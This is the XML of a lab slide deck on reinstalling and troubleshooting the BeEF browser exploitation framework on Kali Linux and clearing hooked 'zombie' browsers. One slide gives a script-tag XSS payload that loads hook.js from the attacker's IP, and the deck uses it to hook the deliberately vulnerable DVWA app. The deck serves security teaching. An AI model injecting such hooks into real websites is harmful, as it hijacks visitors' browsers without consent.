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2" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="284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7" r:id="rId32"/>
    <p:sldId id="282" r:id="rId33"/>
    <p:sldId id="283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F4DE7-34ED-4B54-A3E2-526546621FE3}" v="19" dt="2021-12-11T06:21:3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E0F7-8CBC-428C-A110-3B3509C7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CA1B9-8A04-4CDD-BA7E-A24F2DFA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8ABC-03A5-4B1E-8D0A-B280671D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8A90-E5BF-4FEC-8558-1CDACB58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B6A5-1770-4C7E-8C99-CAED522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73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A8F3-E22E-4613-8223-D2C99403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6571-44A5-4AAC-93AC-C5D45A87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32D4-EF62-4CC1-B68A-F54E0B6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026C-585F-4774-883D-84484CD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9798-4837-4184-9031-D04DE2C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27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C0DB7-CE21-4392-A39A-4B73D4695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CE9A-2862-4BF3-B058-16953DE1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3DCC-9107-4C7A-9742-0F270227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058A-8301-44C7-9765-5CF695B0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61CA-9C13-45BD-8630-BD1A346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4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9546-5411-493F-B11A-F6639CF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1165-DB43-496A-A28A-F9971AE0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40A0-DDBE-41BB-A038-A1DF5CAA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5081-4B9D-4DCA-B6E9-2187432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4D1-892A-414A-AF49-F309400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C84F-637D-4F65-93FB-B45B9C94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575D-ADCD-4CF0-B1E2-31AC5D96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9DA8-D686-4728-99EE-70EE320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7359-3F0A-4DC8-87D4-422C14E4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B510-DC24-40E7-9FDB-A43A0A8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5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3EA6-162D-41B9-BD03-3E3A0B3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4B3-2BA9-4CE4-A99D-D2551A93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A3DE-CAE1-496D-882E-D99231AC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ED9D-E340-48F0-81C7-190C484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929-645E-4262-81B1-4494929B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2498-778F-41B6-836F-B89F1203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4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3BE-A494-4ED9-8186-5BA3C7B5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D045-447E-4B6D-8271-278A7E5A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B5854-7FDA-4581-AD76-C9B7473C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CBBA-45BC-4C4A-9653-C3EC9CAEE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FD13-4542-4548-AED9-299564262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D966-1A44-4811-87EC-544DE54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4F76-CC80-4CED-8357-3CB07D5D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A3343-7044-48A3-BD8D-5E4DB6C5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6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C81E-B492-492F-A849-9A8D88D9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E912C-1961-4C86-BB30-87310F8E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81DA7-94DF-47FA-947B-C35C2CA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B46C9-D6CB-4C1C-89F9-704A0C21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52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04ADE-AA54-4E4B-993D-A4FBD88C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BAB2D-883E-4FA4-BA0C-90941F1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8AAC4-79DD-443F-9713-E50CA9E8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A3E-E871-4EAB-9357-1C50D083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7525-D461-40AC-B80D-B62D4AD0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0406-4DA8-40E1-AD5A-406E2828A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678FA-0E8A-4BE4-A3BE-CAD94460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C3BD-7A5A-4950-B1D0-9E002AF0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1C9E-D819-47DE-9CF7-5A0A6097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19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D843-E28F-4B0B-8549-4A77442F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99B81-9C9A-422A-A5DC-7BDA043CB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3B63-643A-4A16-BD0A-6117022C6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9C5A-E1D7-42AF-BEA6-C6A39AD4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9B4D-8B1B-44F3-B3D6-850194B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F215B-DC4D-4748-A11B-D1D5A2A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1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CB50-388A-4339-AC2C-83029E32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89A2-A905-4C22-85E1-8712A88E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FCA3-0AED-425C-A221-DDCA0A6F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1CC8-2188-47B5-B262-983500E6B943}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>11/12/2021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8414-339E-46E7-A9AC-9068266E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8266-5E72-4543-8074-003D9A8B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7CAFB-D4C2-43AD-9DC3-D1E1405690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4368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5728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lia.com/2021/01/27/failed-to-execute-default-web-browser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7B96-431C-48C3-8A05-093547974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BEeF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – How to remove hooked browser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5F6D-6CB6-4A72-9532-A85EEA64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Must Do Before Common Test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41259-6CB3-4996-8E52-FECF6C85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00175"/>
            <a:ext cx="6324600" cy="405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175E1-7BC9-402E-B889-76E035D1E1A8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you face login problem… you have to remove beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and re-install…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05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EFB8D-1219-42EA-B085-CD5252AD16CD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beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss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B71D8-77D1-4000-AADF-ABECB80F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54" y="1463487"/>
            <a:ext cx="10240477" cy="37355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EAC2115-D8A6-4211-8199-736071CD58D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349624" y="1658993"/>
            <a:ext cx="733130" cy="60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5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D1190-7A4F-4324-BEA8-7CF5B03B0313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="1054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you can’t remove them through the above method. Stop the console and go back to the Terminal where you start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Find the directory where beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is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2AE11-422E-4259-AF2E-40A67F47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39" y="2053477"/>
            <a:ext cx="8735265" cy="40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FC714-D207-477F-82E5-788049ED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2106986"/>
            <a:ext cx="10058652" cy="3702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A7E24-165B-4DAB-BFD1-B49C41F08FCC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the three directories using #rm –r &lt;directory&gt;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17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C2A92-E615-4FC8-91DB-D9F00D80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3" y="643466"/>
            <a:ext cx="106662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5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215A7B-C52F-478E-9711-E87651F708CF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the system and repeat the installation as before …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71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215A7B-C52F-478E-9711-E87651F708CF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still not working, use another method...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FFFB0-8491-4476-BF9E-0ADE48DAFB8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2893944" y="2993335"/>
            <a:ext cx="7166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https://linuxlia.com/2021/01/27/failed-to-execute-default-web-browser/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748C4-DD0B-47FC-8372-ACF18DCC81B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803492" y="4023778"/>
            <a:ext cx="872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this method, it sure works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2980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A63C6-467B-472C-A55B-A5DE4FF2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D637C-B039-4E66-AF47-6418F5259D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6893509" y="3694609"/>
            <a:ext cx="325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-- Do a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –I and operate from there onwards instead of using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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71431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42C38-3816-4192-BAFD-631492A9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38" y="1447829"/>
            <a:ext cx="6072688" cy="500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561F3-7DE6-4F14-9AD6-694476312A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576684" y="370109"/>
            <a:ext cx="325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 Remove all folders related to existing installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175551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8AE1A8-24BE-4961-8CB3-259E2473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502440"/>
            <a:ext cx="10905066" cy="3625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8B37C-D5B5-45E1-9DC3-7A0B991A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3296"/>
            <a:ext cx="6172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B9AD1-FD06-401B-AB95-152646A7EE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576684" y="370109"/>
            <a:ext cx="325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 Existing beef folder also needs to be removed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3EAC64-8080-4BF0-825D-A15D380C4542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5169159" y="1399592"/>
            <a:ext cx="597159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7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F5035-5FCA-419C-A3A0-EB44D3B0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33550"/>
            <a:ext cx="5686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7D24A2F-86AD-4912-A980-A5548CCC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2627458"/>
            <a:ext cx="10905066" cy="3680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B728D-4AF2-4592-84D9-D8EFF8F19D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="968308" y="693864"/>
            <a:ext cx="5441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 into the beef folder in /root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cd beef and run ./install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7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E12D2D1-E6C2-4DBC-8C9A-52550FD4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01" y="643466"/>
            <a:ext cx="5412246" cy="59312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ABD9F4E-DB77-497F-B3FC-B6BE40D23F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2689934" y="4563123"/>
            <a:ext cx="747291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4F83F4-266C-44FA-B9A8-B6261625E900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007706" y="6095445"/>
            <a:ext cx="2429519" cy="420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64EF6-8E97-4EE7-98DD-B28D5118A380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="276775" y="5515423"/>
            <a:ext cx="31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will hit into an error here,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>Follow next page to continue… </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230631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1276C9F-A571-4700-A3FB-C07B0B89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2483755"/>
            <a:ext cx="10337975" cy="1886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D8D20-7EAF-4178-94AB-1F15BE6F53F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105302" y="3694516"/>
            <a:ext cx="5441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Just continue, run this command line under root account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3F704CF-689D-470F-A02B-7A1163DB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5A97E6A-AF99-4680-8FE3-425990B80CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3107184" y="3764132"/>
            <a:ext cx="1322773" cy="18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7352E-6607-422F-B13E-FA63AD3EBF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172989" y="4058500"/>
            <a:ext cx="5441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There are many packages…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3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7E4FF58-8657-4204-86C5-B654658D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300F4-6E7B-43D2-9F33-7EED88EA5A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654631" y="397185"/>
            <a:ext cx="83917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 halfway, you may hit into another problem… see next page to continue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3A7AE33-7C7B-4099-B3DA-CBFA855F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5" y="740762"/>
            <a:ext cx="10905066" cy="523443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903668E-983F-46BA-91CC-AE525336F2C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371408" y="956876"/>
            <a:ext cx="977347" cy="488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A94C0-BB64-4C27-8253-48ADECA84D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="2633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Execute this command line to continue …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292361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359208A-AE6D-457A-92C7-F053165A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15935-1D03-4315-8D5B-6FEADF836BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="2633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Run bundle install again…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248972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8AC05BA-7D5C-483D-9C41-C42CB4F1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79" y="1825023"/>
            <a:ext cx="7974842" cy="1953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DE8BB-0F0C-46A8-98CA-A652DF7DE097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="26337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Enter ./beef to start beef in the beef folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- You will hit this problem, just edit the file and change the password, something like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toortoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” is good.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868080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5DFE0-966C-45A2-BE7F-EE122ACE0038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216856" y="1862812"/>
            <a:ext cx="9538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73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68B4FB-A5D9-4A71-93AF-9537ECE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4FAB5-1460-426B-9E37-A3D8B9DE3316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="26337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Execute ./beef again…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72E75-EC58-41A6-A24E-3CCA47C2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1319601"/>
            <a:ext cx="8742422" cy="4218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530F-A276-4014-A3DD-7FDEAF8C2AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="536046" y="662609"/>
            <a:ext cx="105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the first practice of hooking up the browser that we used to attack the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Bodgelt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> store (see next page)  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12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B1B4CC-6665-4C7A-8DC7-30A9021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D98DE-ADE7-4665-BE56-8A14D4D48644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668045" y="263373"/>
            <a:ext cx="758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Highlight the URL and right click to open the link in the browser and you will get the beef console UI Panel…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3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EBD88-EF79-4C28-9A78-467C0E4F6E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872601" y="875932"/>
            <a:ext cx="758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Hook your DVWA application to continue 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4CD4C-FBD3-4A35-B887-36C66407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35948"/>
            <a:ext cx="7620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305D-5D62-4077-83B7-1C125D7CB2B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105221" y="60618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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>="http://192.168.67.134:3000/hook.js"&gt;&lt;/script&gt;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8526738-955C-430F-9E92-48918265D692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6519996" y="5197360"/>
            <a:ext cx="257277" cy="1244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6DD38-92F3-41A1-925A-3408E06B0167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663954" y="526472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Kali Linux IP Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333959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5DFE0-966C-45A2-BE7F-EE122ACE0038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216856" y="1862812"/>
            <a:ext cx="95386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NOT REMOVE THE ZOOMBIES AND TRY TO HOOK ANY OTHER WEBSITE AFTER THIS !!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41188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EF603-F841-449A-82D5-4630C2C2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547"/>
            <a:ext cx="12192000" cy="431856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E0695E6-9AA6-41E0-8317-447D18152DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377543" y="5971579"/>
            <a:ext cx="490804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975A4EB-5B41-4A23-B93A-12A9D0E8F200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458686" y="1491343"/>
            <a:ext cx="576943" cy="69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5A9C8-B648-4F8C-B5BC-61B01EB06C79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browser is set to the web site ‘s URL, check that and see for yourself. Mine is pointing to a different website because I have reset it. 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25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808B-FAC0-4C57-8C97-C6244683A5A3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we want to test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> web site, we need to remove the zombies or remove all of them in the Offline Browser. Why?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1F9C5-6687-4A79-845D-A01496DE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931504"/>
            <a:ext cx="8239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22188-0247-468C-B939-0CA0A5672DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="351560" y="497224"/>
            <a:ext cx="105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remove it, just right click on the browser and select [Delete Zombie] to delete.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93E47-457E-45E7-8C6B-78422D88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55"/>
            <a:ext cx="12192000" cy="29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7613E-4B1F-4EEA-89BF-61AB956C62B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733713" y="1016752"/>
            <a:ext cx="8724574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your browser and reboot the system and start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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xss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to see they are still there. If they are still there, follow the pages below. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Else, you are ok to use it to test another web site.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9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1B6DE-5186-4570-9B76-EB648603B9BF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Follow the steps below…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03FD6-836C-478D-96D2-9A5D9ACB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03" y="1585950"/>
            <a:ext cx="8216421" cy="477482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12F9B74-6D07-4ABB-A042-62295AB80C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944779" y="1922928"/>
            <a:ext cx="578224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D4BA8E-2DDD-4605-A75A-E1902D87C2FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083732" y="2573752"/>
            <a:ext cx="578224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7613E-4B1F-4EEA-89BF-61AB956C62B3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the system and start beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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xss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…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9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FB4989C32BC48AA839DDD022F4551" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="253e119ea4bb75f9d00c7a5807589351">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="93089eef-c513-4be9-82d5-5a13ba43949f" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e765bb25044e6df7ce284fc490dda636" ns2:_="">
    <xsd:import namespace="93089eef-c513-4be9-82d5-5a13ba439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89eef-c513-4be9-82d5-5a13ba439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145D-6F82-4297-BE3B-7F8F27BDFB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9D823-0FF4-4F79-A041-C2B81A9438E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93089eef-c513-4be9-82d5-5a13ba43949f"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="ffd8f815-88b9-4c59-a97c-62b35b622469"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{04AE15FB-D051-4F96-A0EA-8B2DE52B67C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Meiryo</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>BEeF – How to remove hooked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BEeF – How to remove hooked browser</dc:title>
  <dc:creator>Hock Guan TAN (NP)</dc:creator>
  <cp:lastModifiedBy>Hock Guan TAN (NP)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-07T23:26:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-12T03:14:45Z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2021-12-07T23:26:54Z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e5a27b3b-5fff-464b-a6b1-222253086e69</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160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Non Sensitive</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ContentTypeId">
    <vt:lpwstr>0x0101005F3FB4989C32BC48AA839DDD022F4551</vt:lpwstr>
  </property>
</Properties>
</file>